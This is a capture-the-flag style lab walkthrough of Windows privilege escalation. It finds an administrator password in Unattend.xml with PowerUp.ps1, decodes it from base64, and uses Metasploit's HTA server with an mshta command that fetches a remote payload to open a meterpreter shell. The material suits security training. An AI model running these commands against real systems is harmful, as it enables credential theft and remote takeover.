Unattended Installation

overview

This lab covers usage of PowerUp.ps1 Powershell script to find a common Windows privilege escalation flaw.

PowerSploit: PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment.

PowerUp.ps1: PowerUp aims to be a clearing house of common Windows privilege escalation vectors that rely on misconfigurations.

Source: https://github.com/PowerShellMafia/PowerSploit

tasks

Lab Environment

In this lab environment, you will be provided with GUI access to a Kali machine and a Windows machine.

Your task is to run PowerUp.ps1 Powershell script to find a common Windows privilege escalation flaw that depends on misconfigurations. The PowerSploit post-exploitation framework has been provided to you on the Windows machine.

Objective: Gain access to meterpreter session with high privilege.

Tools

The best tools for this lab are:

PowerUp.ps1
Metasploit Framework
Powershell

Solution

Step 1: Switch to Attacker Machine for locating a privilege escalation vulnerability.

Content Image

Step 2: Open powershell.exe terminal to check the current user.

Content Image

We are running as a student user. The PowerSploit framework and Powerup.ps1 scripts are provided.

Step 3: We will run the powerup.ps1 Powershell script to find privilege escalation vulnerability.

Commands:

cd .\Desktop\PowerSploit\Privesc\
ls

Content Image

Step 4: Import PowerUp.ps1 script and Invoke-PrivescAudit function.

Commands:

powershell -ep bypass (PowerShell execution policy bypass)
. .\PowerUp.ps1
Invoke-PrivescAudit

Content Image

We can notice that there is an Unattend.xml file present on the system. Open the Unattend.xml file.

Unattend.xml: Unattend.xml is an answer file for installation. The files may contain encoded or plain-text credentials and other sensitive information.

Step 5: Reading Unattend.xml file.

Command:

cat C:\Windows\Panther\Unattend.xml

Content Image

We have discovered an administrator encoded password. i.e “QWRtaW5AMTIz”.

Step 6: Decoding administrator password using Powershell.

Commands:

$password='QWRtaW5AMTIz'
$password=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($pa
ssword))
echo $password

Content Image

The administrator password is “Admin@123”.

Step 7: We are running a command prompt as an administrator user using discover credentials.

Commands:

runas.exe /user:administrator cmd
Admin@123
whoami

Content Image

We are running cmd.exe as an administrator.

Switch to the Kali Machine.

Step 8: Running the hta_server module to gain the meterpreter shell. Start msfconsole.

Commands:

msfconsole -q
use exploit/windows/misc/hta_server
exploit

“This module hosts an HTML Application (HTA) that when opened will run a payload via Powershell.”

Content Image

Copy the generated payload i.e “http://10.10.31.2:8080/Bn75U0NL8ONS.hta” and run it on cmd.exe with mshta command to gain the meterpreter shell.

Switch to Target Machine.

Step 9: Gaining a meterpreter shell.

Command:

mshta.exe http://10.10.31.2:8080/Bn75U0NL8ONS.hta

Note: You need to use your own metasploit HTA server link.

Content Image

We can expect a meterpreter shell.

Content Image

Step 10: Find the flag.

Commands:

sessions -i 1
cd /
cd C:\\Users\\Administrator\\Desktop
dir
cat flag.txt

Content Image

This reveals the flag to us.

Flag: 097ab83639dce0ab3429cb0349493f60

Conclusion

In this lab, we exploited a common Windows privilege escalation flaw and gained a meterpreter session with high privilege.

References

PreviousWindows: PrivescCheck NextCredential Management

Last updated 10 months ago